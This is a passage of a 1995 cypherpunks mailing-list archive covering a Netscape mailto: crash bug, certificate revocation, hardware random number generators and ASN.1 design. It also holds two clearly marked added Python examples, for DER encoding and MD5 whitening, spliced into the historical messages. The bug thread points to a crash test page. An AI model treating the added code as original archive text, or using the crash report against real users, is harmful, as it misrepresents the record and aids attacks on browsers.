      implanted under the skin with a syringe and read with a
      scanner.


   ZIT_pus  (7 kb)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steven Champeon - Imonics Development <schampeo@imonics.com>
Date: Tue, 3 Oct 95 06:56:10 PDT
To: rjc@clark.net
Subject: Re: New Netscape bug (in version 1.12)
Message-ID: <9510031355.AA18290@fugazi.imonics.com>
MIME-Version: 1.0
Content-Type: text/plain



|   From owner-cypherpunks@toad.com Tue Oct  3 04:39:23 1995
|   Subject: New Netscape bug (in version 1.12)
|   X-Mailer: ELM [version 2.4 PL24alpha3]
|   Content-Transfer-Encoding: 8bit
|   Sender: owner-cypherpunks@toad.com
|   X-Status: 
|   
|   
|   C'punks, 
|     I just got back from a vacation in Raleigh, and downloaded the
|   new "fixed" Netscape 1.12. It took me about an hour, but I've
|   discovered another bug and potential security hole. This one relates
|   to mailto:.

Well, I'm still in Raleigh :-) but this doesn't do much of anything
to my Macintosh, Netscape 1.1N, under System 7.5. Looks like a bug
in your X server. However, Netscape 1.1N for Solaris, running under
X11R6 X server, dumps core fairly quickly. I haven't had a chance
to try out the 1.12 version on UNIX or Mac, but the 1.22 32-bit 
Windoze version handles it fine under NT 3.5.1.

Steve

--
Steven Champeon                                (919) 469-7833
Technical Lead,                          schampeo@imonics.com
Imonics Web Services                    webmaster@imonics.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Tue, 3 Oct 95 10:00:06 PDT
To: jsw@neon.netscape.com
Subject: Re: Netscape finally issuing md5sums/pgp signed binaries ? (was Re: NetScape's dependence upon RSA down for the count!)
Message-ID: <9510031656.AA00760@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
>   I've been thinking about this recently for obvious reasons.  My concern
> is that if someone can attack your download of netscape, they could also
> attack your download of the program that validates netscape.  Is there
> really any way out of this one?
> 
> 	--Jeff

I remember sometime in the last couple of years seeing a cert advisory that
said that people's checksumming programs were being replaced by ones that
did the normal checksumming except on compromised programs.  This was part
of one particular attack as I remember.

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Tue, 3 Oct 95 07:25:35 PDT
To: stewarts@ix.netcom.com
Subject: Re: Certificate proposal
In-Reply-To: <199510022148.OAA26396@ix7.ix.netcom.com>
Message-ID: <9510031421.AA18121@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>Date: Mon, 02 Oct 1995 14:48:26 -0700
>From: Bill Stewart <stewarts@ix.netcom.com>
>
>1) X.509 explicitly addresses Certificate Revocation Lists, though it
>	   isn't real precise about how they should be distributed, and the
>	   hierarchical approach isn't necessarily the best.  (Maybe put the 
>	   location of the preferred CRL for a key certificate in the cert itself?)

The whole issue of CRLs is on shaky ground with me.  I think it's gotten
lost in debates about how to distribute them offline (or perhaps via
e-mail) and have them work.

CRLs are like the old credit card or check stop lists which used to be at
every supermarket checkout station.  They aren't there any more.
Checkout stations are now on-line.

I see nothing wrong with having a "certificate" which says ``certificate
available online only at xxx@yyy.zzz''.

>3) Neither PGP nor X.509 (as documented in the RFC1422 and PKCS#6) have any
>	   mechanism for additional information other than cramming it into
>	   the username, but supposedly X.509 Version 3 includes something?

Yup -- and it's ugly.  It counts on a defined OBJECT ID to define the
attribute.  That means that if you want to say something about a person
("Boy, she's good looking!") you need to get someone tied to the OBJID
hierarchy to issue you a number.  If that number is low enough in the
tree, (is long enough), then you have the problem that no one knows
what it means.  For that matter, even numbers high in the tree are
unknown to me.  I've never seen a dictionary of OBJECT IDs.

>Binding a key to a text-string usually representing a person does give you
>the slack to use other mechanisms rather than wait for the release of
>/standard-name="Attribute Semantics Notation"/version=32769/ORG="International
>Slowness Organization"/Country=none/reliability=ExtremelyHighTrustUsThisTime/versionhistory=

Clearly.  One should never wait for ISO.  In fact, ISO should probably be
ignored from now on.  (Have you seen on-line Dilbert today?)

but back to the question: the slack to use other mechanisms is the weak
link I was talking about.  You are building a chain from attribute or
permission or authorization over to a person where one link (certificate)
is a steel link and the other (binding to person) is mercerized cotton.  If
you want to strengthen the second link, you have to do things like the
national ID card -- or restrict the second link to corporate use (the
current approach) -- or otherwise regiment the human body in physical
space.  By chaining directly from key to authorization, the human can be
anonymous in physical space while still being known in cyberspace.

The thing to avoid is the following:

>Make a determination in your own mind whether this key actually
>belongs to the person whom you think it belongs to, based on available
>evidence.  If you think it does, then based on your estimate of
>that person's integrity and competence in key management, answer
>the following question:

The only way to make that determination is to look at the text string and
the list of other people who have signed it -- to see if I think they might
know a different Bill Stewart from the person I know.  But then, since I
don't know Bill Stewart at all (except by postings), that's irrelevant to
me.  Therefore, I can not meet that test.  However, there is no reason for
me to reject your key as invalid.  What's invalid is the assumption that
there must be a relationship (or even a person) in physical space *before*
one can have a relationship (or a person) in cyberspace.

>For now, there do seem to be some kinds of attributes that would benefit from
>better representations than a human-name plus free-form text, such as
>"which application does the user want you to use this key for?" "how much
>should I trust the user's desire to have me use that key for that application?"
>"how do I get this key's owner to give me money?" "does the key-holder 
>have the authority to speak for a given organization/human/bank account?"

I prefer text.  I didn't say it had to be free form -- only that it had to
include free form so that I could say, from one human to another, something
which no one had anticipated and sign that.

If you want a machine to read it, you can use SMTP-style "tag: value".

The idea that machine readability requires binary transfer and/or ASN.1
encoding (e.g., OBJECT IDs) is ludicrous.

>If you look at Verisign's DNs, or the text in my PGP keys, you'll see various
>ugly attempts at this.

I looked at your keys, just now, and see a whole bunch of keys but no
statements like:

"this person is allowed to withdraw money from bank account 017123 of xxx"
or
"this person is a trusted co-conspirator in the group called Cypherpunks"
or
anything else useful to me.

I tried adding an informative UserID to my key on the MIT server -- and
it came out as my primary ID.  ...big mistake..


>And then there's "WHICH person named Bill Stewart does this key belong to?"

Exactly.  Back to my point: the fact that you're named ``Bill Stewart'' and
are a person is probably important to you -- but if I'm accepting your
e-check, I don't give a damn about either.  What I care about is whether
the signature on the e-check (i.e., the public key) is certified by the
bank.  In checking that authorization (attribute), I don't need to refer to
a person's name.  That's an irrelevant step in the process, brought on by
the way X.509 and PGP both define certificates.

>For the latter, I'm interested in solutions other than "Social Security Number",
>"Citizen-Unit Nationalized ID Card Number", etc.

Amen!

 - Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison      cme@tis.com    http://www.clark.net/pub/cme	   |
|Trusted Information Systems, Inc.   http://www.tis.com/                   |
|3060 Washington Road          PGP 2.6.2:  61E2DE7FCB9D7984E9C8048BA63221A2|
|Glenwood MD  21738         Tel:(301)854-6889      FAX:(301)854-5363       |
+--------------------------------------------------------------------------+

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMHFF/lQXJENzYr45AQEMwQP8Dw1yd4vHzYGY57FpwWlWxquJLHsS3LrJ
tVYEEpCXu7/lGcHVd2o2KDeZHZy7r6qiQ7zo5eayFQlIkRPYjBmRzuvADwLisR7D
NK7l6dFVY2fA+SAmLiMtwz2VzsByZGB8HYw3joc+erNfmAmjeOLyVeg5pTaP9Rnu
/Xb2SWE4d14=
=WVyj
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 3 Oct 95 07:23:49 PDT
To: Simon Spero <ses@tipper.oit.unc.edu>
Subject: Re: Simple Hardware RNG Idea
In-Reply-To: <Pine.SOL.3.91.951002225219.7461A-100000@chivalry>
Message-ID: <199510031423.KAA01406@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Simon Spero writes:
> On Tue, 3 Oct 1995, Perry E. Metzger wrote:
> > Radio signals can be interfered with or listened to -- never
> > underestimate the opponent. Computer interfaced radiation detectors,
> > in spite of Tim's claim to the contrary, are pretty cheap and very
> > hard to interfere with.
> 
> What about a beam of high intensity ionising radiation aimed at the 
> detector?

If you are paranoid, put the detector in a lead box and you are
done. It's not hard to get the lead thick enough that tampering
attempts would be noticed very easily. Trying to shield an object from
radio signals and still manage to get meaningful numbers out (rather
than self generated signal) is a hard problem, but this can be done by
a high school student.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Tue, 3 Oct 95 07:39:36 PDT
To: schampeo@imonics.com (Steven Champeon - Imonics Development)
Subject: Re: New Netscape bug (in version 1.12)
In-Reply-To: <9510031355.AA18290@fugazi.imonics.com>
Message-ID: <199510031439.KAA13026@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Well, I'm still in Raleigh :-) but this doesn't do much of anything
> to my Macintosh, Netscape 1.1N, under System 7.5. Looks like a bug
> in your X server. However, Netscape 1.1N for Solaris, running under
> X11R6 X server, dumps core fairly quickly. I haven't had a chance
> to try out the 1.12 version on UNIX or Mac, but the 1.22 32-bit 
> Windoze version handles it fine under NT 3.5.1.

  Could someone try this on Solaris using 1.12?

-Ray



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Tue, 3 Oct 95 07:44:55 PDT
To: cypherpunks@toad.com
Subject: Re: CISS TSP MISSI
Message-ID: <9510031443.AA11367@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


I don't know which is more annoying:
	The silly 3/4K of Comments that the freezone remailer puts out.
	(The use constraints are useless to email recipients, after all); or

	That some anonymous bozo is posting open WWW data to cypherpunks.

I hope that the first, at least, can be fixed.

Avoid clutter; note the reply-to.
	/r$





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Tue, 3 Oct 95 07:57:18 PDT
To: ses@tipper.oit.unc.edu
Subject: Re: De Re ASN.1 and encoding rules ( was Re: X.509,...)
In-Reply-To: <Pine.SOL.3.91.951002141516.6137B-100000@chivalry>
Message-ID: <9510031453.AA22371@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


(my friend Tom is cc:'d as the Multics expert, re: the ref below)
-----BEGIN PGP SIGNED MESSAGE-----

>Date: Mon, 2 Oct 1995 17:13:21 -0700 (PDT)
>From: Simon Spero <ses@tipper.oit.unc.edu>

>Let's use 3DES as our example. We'll start with a naive specification:

[etc.]

You're starting down the same road I did in writing my example of how ASN.1
seduces you into bad design.  ..very good, but you stopped short.

[The PER sounds much better than BER -- but I've never seen PER before.  I
learned enough about ASN.1 to have decided it is a lost cause -- far easier
to let ASN.1 advocates talk to themselves while I go off to do something
independent and good.]

Back to the example.

>--
>LongLong ::= OCTET STRING (SIZE(8)) -- a long long is 8 bytes, er, long

Really?  There is an OCTET STRING (SIZE(8)) and you can make it a datatype?

I suppose you can make an OCTET STRING (SIZE(9)) too?

That can be really convenient.  You can have a tagged quantity (using the
top byte).  Alternatively, someone could define:

DesKey ::= SEQUENCE {
 encr BIT STRING (SIZE(1)), -- encrypt mode if 1, decrypt if 0
 value OCTET STRING (SIZE(8))
}

and now you can use DesKey as your data type with no bad effects and only
good ones (as far as the ASN.1 user is concerned).  Of course, the code to
pack/unpack just exploded.  So did the packet size (maybe, depending on
effort spent in pack/unpack) and so did the internal struct, probably.

[Truth in advertising: the example above is adapted from early Multics
where PL/I allowed you to do such nonsense and some programmer saw the
power of it -- so he used it in the file system, until he got caught.]

Lesson from this: there is a reason not to give a designer generality you
would not use in an actual implementation.

Anyway -- my example of ASN.1 abuse is along these lines but I won't
reproduce it here.  We can leave this as a parlor game for computer geeks.
:-)


>Here's the new definitions:
>
>--
>Long ::= OCTET STRING (SIZE(4))
>
>ThreeDes ::=SEQUENCE {
>	   IV SEQUENCE OF (SIZE(1..2) LONG,
>	   Key1 DesKey,
>	   Key2 DesKey OPTIONAL,
>	   Key3 DesKey OPTIONAL
>}

See -- ASN.1 is powerful in its seductiveness.  Even though you were trying
to convince me that it can be the same as my primitive example (and
therefore just as efficient), you couldn't resist using the power of the
generality to elaborate on the structure.

This is not a good feature of ASN.1.  This is its primary fault.  This is
why I call it a work of Satan.  (BER/DER helps in that evaluation, of
course).


>To be continued... (unless I get flamed off the list)

As I said, this could be a wonderful parlor game -- or list topic, if
people want to waste the time.  Think of it as the Crossword Puzzle page of
the cypherpunks on-line newspaper. :-)

 - Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison      cme@tis.com    http://www.clark.net/pub/cme	   |
|Trusted Information Systems, Inc.   http://www.tis.com/                   |
|3060 Washington Road          PGP 2.6.2:  61E2DE7FCB9D7984E9C8048BA63221A2|
|Glenwood MD  21738         Tel:(301)854-6889      FAX:(301)854-5363       |
+--------------------------------------------------------------------------+

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMHFNJFQXJENzYr45AQFV2AP9H1/A5bY4H8C/Ms3dhHIPOWiLCYhqLzFR
qKdvQaBYvPDCrr8jXLwQhTogvzu/9gkZ2DwnXVya7MxEpyy+1A5WrO3Jlqu+6Euy
bBcl1idhoomMzmzOga/F7YasXsFkoZoSqNYQKX/ZKcFvEuDGrzohlBNV5ubDEL7G
E3hdsak0f2Y=
=cjU/
-----END PGP SIGNATURE-----
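
[Added example, not part of the archived message above. It encodes the two definitions from the message, LongLong as OCTET STRING (SIZE(8)) and the DesKey SEQUENCE, under DER and decodes each strictly, to show how much the packed size and the unpacking code grow. Function names and the sample key are constructed for this illustration.]

```python
# Added example: DER encodings of LongLong and DesKey from the message above.
# All names here are this example's own; the key value is constructed.

SAMPLE_KEY = bytes.fromhex("0123456789abcdef")  # constructed 8-byte value


class DerError(ValueError):
    """Input is not the exact DER encoding the decoder expects."""


def der_length(n):
    """Encode a length in DER's shortest form."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def tlv(tag, content):
    """Build one tag-length-value element."""
    return bytes([tag]) + der_length(len(content)) + content


def encode_longlong(key):
    # LongLong ::= OCTET STRING (SIZE(8))
    if len(key) != 8:
        raise ValueError("key must be exactly 8 bytes")
    return tlv(0x04, key)


def encode_deskey(encr, key):
    # DesKey ::= SEQUENCE { encr BIT STRING (SIZE(1)),
    #                       value OCTET STRING (SIZE(8)) }
    # A 1-bit BIT STRING is one content byte preceded by "7 unused bits".
    bit = tlv(0x03, bytes([7, 0x80 if encr else 0x00]))
    return tlv(0x30, bit + encode_longlong(key))


def read_tlv(buf, pos, want_tag):
    """Read one element at pos; return (content, position after it)."""
    if pos + 2 > len(buf):
        raise DerError("truncated header")
    tag, first = buf[pos], buf[pos + 1]
    if tag != want_tag:
        raise DerError("unexpected tag 0x%02x" % tag)
    pos += 2
    if first < 0x80:
        length = first
    else:
        n = first & 0x7F
        if n == 0 or pos + n > len(buf):
            raise DerError("indefinite or truncated length")
        length = int.from_bytes(buf[pos:pos + n], "big")
        if length < 0x80 or buf[pos] == 0:
            raise DerError("length not in shortest form")
        pos += n
    end = pos + length
    if end > len(buf):
        raise DerError("truncated content")
    return buf[pos:end], end


def decode_longlong(buf):
    key, end = read_tlv(buf, 0, 0x04)
    if end != len(buf):
        raise DerError("trailing bytes")
    if len(key) != 8:
        raise DerError("SIZE(8) constraint violated")
    return key


def decode_deskey(buf):
    body, end = read_tlv(buf, 0, 0x30)
    if end != len(buf):
        raise DerError("trailing bytes after SEQUENCE")
    bits, pos = read_tlv(body, 0, 0x03)
    # Exactly one bit: unused-bit count 7, and the 7 padding bits zero.
    if len(bits) != 2 or bits[0] != 7 or bits[1] not in (0x00, 0x80):
        raise DerError("encr is not a 1-bit BIT STRING")
    key, pos = read_tlv(body, pos, 0x04)
    if pos != len(body):
        raise DerError("trailing bytes inside SEQUENCE")
    if len(key) != 8:
        raise DerError("SIZE(8) constraint violated")
    return bits[1] == 0x80, key


if __name__ == "__main__":
    plain = encode_longlong(SAMPLE_KEY)
    seq = encode_deskey(True, SAMPLE_KEY)
    print("raw key      ", len(SAMPLE_KEY), "bytes", SAMPLE_KEY.hex())
    print("LongLong DER ", len(plain), "bytes", plain.hex())
    print("DesKey DER   ", len(seq), "bytes", seq.hex())
    print("decoded      ", decode_deskey(seq))
```

The one extra bit of information doubles the packed size relative to the raw key, and every constraint in the type definition becomes a check the decoder has to enforce.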




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Tue, 3 Oct 95 08:05:29 PDT
To: Simon Spero <cypherpunks@toad.com
Subject: Re: Simple Hardware RNG Idea
In-Reply-To: <Pine.SOL.3.91.951002225219.7461A-100000@chivalry>
Message-ID: <9510031505.AA11622@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>What about a beam of high intensity ionising radiation aimed at the 
>detector? Since we're dealing with lo intensity sources, this could force
>the RNG into a small part of its range. Beware of black helicopters 
>carrying cyclotrons :-)

Thermal noise is a much less hazardous mechanism. Ionising radiation is
a pain to deal with, it is something one generally attempts to get rid
of in a fabrication process if possible. Environmental radiation is a
strong polluting source.

There are plenty of other quantum phenomena which can be tapped.
Essentially all one needs to do is to build a very high gain amplifier
"badly". The main difficulty is removing bias. One can either go through
filtering hohaa or use say MD5. The truly paranoid could Xor together an
odd number of MD5 samples just in case there were bit pattern
dependencies.

	Phill
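
[Added example, not part of the archived message above. It hashes blocks of biased raw samples with MD5 and XORs an odd number of digests, as the message suggests, then compares the fraction of one-bits before and after. The seeded software generator standing in for the noisy amplifier, the 80% bias, the block size and all function names are assumptions of this illustration.]

```python
# Added example: whitening a biased bit source with MD5, then XORing an odd
# number of digests. The "hardware" here is a seeded PRNG (an assumption made
# so the run is reproducible); a real source would replace biased_bits().
import hashlib
import random

RAW_BITS_PER_BLOCK = 512   # assumed block size; at p(1)=0.8 this carries
                           # far more than 128 bits of entropy
DIGESTS_PER_OUTPUT = 3     # the "odd number" of MD5 samples


def biased_bits(rng, count, p_one=0.8):
    """Simulated raw samples: each bit is 1 with probability p_one."""
    return [1 if rng.random() < p_one else 0 for _ in range(count)]


def pack_bits(bits):
    """Pack a list of 0/1 values into bytes, most significant bit first."""
    out = bytearray()
    for i in range(0, len(bits), 8):
        byte = 0
        for b in bits[i:i + 8]:
            byte = (byte << 1) | b
        out.append(byte)
    return bytes(out)


def whiten(raw_blocks):
    """MD5 each raw block and XOR the digests into one 16-byte output.

    The count must be odd: identical blocks then still yield their digest,
    whereas an even number of identical digests would XOR to all zeros.
    """
    if len(raw_blocks) % 2 == 0:
        raise ValueError("need an odd number of blocks")
    acc = bytes(16)
    for block in raw_blocks:
        digest = hashlib.md5(block).digest()
        acc = bytes(x ^ y for x, y in zip(acc, digest))
    return acc


def ones_fraction(data):
    """Fraction of bits set to 1 in a byte string."""
    return sum(bin(b).count("1") for b in data) / (8 * len(data))


def run_demo(outputs=200, seed=1995):
    """Return (raw one-bit fraction, whitened one-bit fraction)."""
    rng = random.Random(seed)
    raw = bytearray()
    white = bytearray()
    for _ in range(outputs):
        blocks = [pack_bits(biased_bits(rng, RAW_BITS_PER_BLOCK))
                  for _ in range(DIGESTS_PER_OUTPUT)]
        for block in blocks:
            raw += block
        white += whiten(blocks)
    return ones_fraction(bytes(raw)), ones_fraction(bytes(white))


if __name__ == "__main__":
    raw_frac, white_frac = run_demo()
    print("raw one-bits:      %.3f" % raw_frac)
    print("whitened one-bits: %.3f" % white_frac)
```

Hashing removes the visible bias but cannot add entropy, so each block must contain more raw entropy than the 128 bits it is condensed to.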
 



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steven Champeon - Imonics Development <schampeo@imonics.com>
Date: Tue, 3 Oct 95 08:22:11 PDT
To: rjc@clark.net
Subject: Re: New Netscape bug (in version 1.12)
Message-ID: <9510031521.AA18707@fugazi.imonics.com>
MIME-Version: 1.0
Content-Type: text/plain


|   From owner-cypherpunks@toad.com Tue Oct  3 11:07:33 1995
|   Subject: Re: New Netscape bug (in version 1.12)
|   Cc: rjc@clark.net, cypherpunks@toad.com
|   X-Mailer: ELM [version 2.4 PL24alpha3]
|   Content-Transfer-Encoding: 8bit
|   Sender: owner-cypherpunks@toad.com

Ray wrote, in reply to my message:

|   > 
|   > Well, I'm still in Raleigh :-) but this doesn't do much of anything
|   > to my Macintosh, Netscape 1.1N, under System 7.5. Looks like a bug
|   > in your X server. However, Netscape 1.1N for Solaris, running under
|   > X11R6 X server, dumps core fairly quickly. I haven't had a chance
|   > to try out the 1.12 version on UNIX or Mac, but the 1.22 32-bit 
|   > Windoze version handles it fine under NT 3.5.1.
|   
|     Could someone try this on Solaris using 1.12?

Just tried it, with two different mailhosts - the first gave the following
error:

	An error occurred sending mail:
	The "To:" header was invalid.

	Please check the email address(es) and try again.

The second accepted the mail. (?) Neither caused it to core dump, under
the X11R6 X server, Solaris 2.4, running Openwindows.

Cheers,

Steve

--
Steven Champeon                                (919) 469-7833
Technical Lead,                          schampeo@imonics.com
Imonics Web Services                    webmaster@imonics.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Barrett <barrett@iafrica.com>
Date: Tue, 3 Oct 95 02:32:42 PDT
To: "Cancelmoose[tm]" <moose@cm.org>
Subject: IETF "Voluntary Access Control" working group
In-Reply-To: <199510012022.OAA07852@nag.cs.colorado.edu>
Message-ID: <Pine.NEB.3.91.951003111132.28641d-100000@daisy.ee.und.ac.za>
MIME-Version: 1.0
Content-Type: text/plain


> It would make a great project if a bunch of cypherpunks installed
> NoCeM and then piped the list to a newsgroup.  We could then develop
> reputation servers to help us use NoCeM, start charging cyberbucks for
> our recommendations, and, in short, make cpunks into a slightly larger
> outpost in Cyberlibertaria. (a.k.a. The Free Net)

The IETF "Voluntary Access Control" working group could probably use a few
more people who are interested in the type of access control enabled by
reputation servers, as opposed to the type of access control imposed by
censorship servers.  Subscribe to the mailing list via
vac-wg-request@naic.nasa.gov. 

--apb (Alan Barrett)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 3 Oct 95 11:37:47 PDT
To: Carl Ellison <cme@TIS.COM>
Subject: Re: Certificate proposal
Message-ID: <199510031838.LAA27571@ix2.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:21 AM 10/3/95 EDT, Carl Ellison <cme@TIS.COM> wrote:
>The whole issue of CRLs is on shaky ground with me.  I think it's gotten
>lost in debates about how to distribute them offline (or perhaps via
>e-mail) and have them work.
No surprise; it's a tough job.  I don't expect my laptop to be
continuously on-line when I'm reading mail, and even on-line use
needs to be more realistic than saying "Everybody must use X.400".

>CRLs are like the old credit card or check stop lists which used to be at
>every supermarket checkout station.  They aren't there any more.
>Checkout stations are now on-line.
>I see nothing wrong with having a "certificate" which says ``certificate
>available online only at xxx@yyy.zzz''.

Interesting.  Aside from the excessive cost of looking up cards in paper
booklets, which can be avoided by having checkstands validate on the
store's backroom computer system, on-line verification lets the card
company not only refuse stolen cards, but also dynamically refuse cards
that have reached their credit limits, which you can't do on a slow
push-based offline system.

However, it's _very_ tough to spoof a credit-card verification system, 
because the checkout device uses phones or private networks to reach the 
authorization company, so the response that comes back saying yes/no/stolen
can be real dumb.  On the internet, the response needs to be signed,
though I suppose it could say "Key sssss at xxx@yyy.zzz authorized
key uuuuu today yyyy/mm/dd/hh:mm:ss, valid for up to $500", and you'd then have
to validate the key that signed it, etc....  On the other hand, you could
have the cert require multiple confirmations, e.g. both the bank and the
user have to authorize this use.

>>3) Neither PGP nor X.509 (as documented in the RFC1422 and PKCS#6) have any
>>	   mechanism for additional information other than cramming it into
>>	   the username, but supposedly X.509 Version 3 includes something?
>Yup -- and it's ugly.  It counts on a defined OBJECT ID to define the

OBJECT IDs solve two problems - one is that you need some kind of format (yuk),
but the other is that fields need to have mutually agreed on values to be meaningful,
and central registration is an easy way to implement it, as long as there's
a simple way to register things.  I hope it at least supports an OBJECTID
with parameters, e.g. "CreditLimitUSDollarsBankFoo integer"  rather than needing
excessively many OBJECTIDs "CreditLimit3700USDollarsBankFoo"?  As you say below,
there's certainly no need to use ASN.1 formats instead of readable ones...

> What's invalid is the assumption that
>there must be a relationship (or even a person) in physical space *before*
>one can have a relationship (or a person) in cyberspace.

Yeah.  I've decided, as an experiment, to start signing keys for pseudonyms,
though I haven't settled on how to deal with unauthenticated signatures
for realspace people (in the one case where I've been asked, the person
didn't have any independent signatures from other people, so so far I've
declined, but I may re-evaluate and just do uniqueness.)

#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aleph One <aleph1@dfw.net>
Date: Tue, 3 Oct 95 09:48:32 PDT
To: Ray Cromwell <rjc@clark.net>
Subject: Re: New Netscape bug (in version 1.12)
In-Reply-To: <199510030836.EAA09080@clark.net>
Message-ID: <Pine.SUN.3.90.951003114512.29696A-100000@dfw.net>
MIME-Version: 1.0
Content-Type: text/plain


This bug does not crash Netscape 1.1S running on an SGI.

Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 

On Tue, 3 Oct 1995, Ray Cromwell wrote:

> Date: Tue, 3 Oct 1995 04:36:44 -0400 (EDT)
> From: Ray Cromwell <rjc@clark.net>
> To: cypherpunks@toad.com
> Subject: New Netscape bug (in version 1.12)
> 
> 
> C'punks, 
>   I just got back from a vacation in Raleigh, and downloaded the
> new "fixed" Netscape 1.12. It took me about an hour, but I've
> discovered another bug and potential security hole. This one relates
> to mailto:.
> 
>   The bug is as follows. Create a HTML file with a hyperlink containing
> the following URL
> 
>  foo 
> 
> This bug doesn't seem to crash Netscape, instead, it crashes my XServer
> as soon as the mail window pops up. I'm too tired right now to try to
> analyze it, but it might be another stack bug, this time, in the X
> libraries because Netscape isn't doing any sanity checking.
> 
> I need help testing this bug on other platforms. I have created
> a test page. Go to http://www.gl.umbc.edu/~rcromw1/crash.html
> to test.
> 
> I have also found 2 other bugs that cause stack trashing in v1.1
> however, they are random and I haven't been able to isolate them
> completely yet. (I have created a page on my system, such that if you
> visit it, after you visit about 3 more pages, it crashes)
> 
> What's my point in pursuing this? Netscape's browser is a piece of
> software that runs on millions of computers and in effect, allows
> outside agents to input arbitrary data into that software. As such,
> it is unlike most applications made. Sure, Microsoft Word may have bugs,
> but how many people are downloading hundreds of MS Word documents
> every day and viewing them? Users of Web browsers are exposing themselves
> like this every day, and so I think, that web browsers must have higher
> standards of robustness.
> 
> 
> I think Netscape represents an enormous risk to computer security,
> and while I think they are heading in the right direction, there are
> some very basic implementation issues they need to clear up which are
> orthogonal to SSL and credit card transactions. All the cryptography
> in the world won't help you if someone can subvert your cryptobox.
> Netscape needs to do some serious quality assurance work. I've never
> been a QA person in my life, but within a few minutes, I have been
> able to find serious bugs in the software. And while I'm sure
> Netscape's coders are fine people, proof reading your own code,
> code that you look at everyday, becomes rather hard because you
> tend to "see through it". (just like proof reading essays, or messages)
> I think Netscape should hire some outside firm/group to review their
> code under non-disclosure for potential implementation holes.
> 
> -Ray Cromwell <rjc@clark.net>
> P.S. I am running Netscape v1.12 under BSDI2.0 and the XAccel/2.0 server
> 
> 
>  
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marc Ramirez <mrami@mramirez.sy.yale.edu>
Date: Tue, 3 Oct 95 09:20:11 PDT
To: sameer <sameer@c2.org>
Subject: Re: New Netscape bug (in version 1.12)
In-Reply-To: <199510030840.BAA04677@infinity.c2.org>
Message-ID: <Pine.BSF.3.91.951003121902.8709B-100000@mramirez.sy.yale.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 3 Oct 1995, sameer wrote:

> 	Doesn't crash on SunOS 4.1.3_U1 running X11R6.

Nor does it crash FreeBSD 2.1-STABLE w/ X11R6

> > I need help testing this bug on other platforms. I have created
> > a test page. Go to http://www.gl.umbc.edu/~rcromw1/crash.html
> > to test.
> 
> -- 
> sameer						Voice:   510-601-9777
> Community ConneXion				FAX:	 510-601-9734
> An Internet Privacy Provider			Dialin:  510-658-6376
> http://www.c2.org (or login as "guest")			sameer@c2.org
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pfarrell@netcom.com (Pat Farrell)
Date: Tue, 3 Oct 95 13:24:28 PDT
To: cypherpunks@toad.com
Subject: Oct 14 DC-area physical meeting
Message-ID: <199510032024.NAA29838@netcom3.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Sorry to send this to 800+ folks, this is the only announcement I'll
send this month.

The October DC-area cypherpunks meeting will be on Saturday, Oct. 14
at 3:00 PM at the Digital Express offices in Laurel.
For more information (directions, agenda, etc.), please see url:
http://www.isse.gmu.edu/~pfarrell/dccp/index.html

Additional agenda topics solicited!

Thanks
Pat

Pat Farrell      grad student        http://www.isse.gmu.edu/students/pfarrell
Infor. Systems and Software Engineering, George Mason University, Fairfax, VA
PGP key available via finger or request           #include standard.disclaimer




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 3 Oct 95 13:39:48 PDT
To: cypherpunks@toad.com
Subject: Monkeywrenching Certificate Schemes
Message-ID: <ac96ebe0120210043a20@[205.199.118.202]>
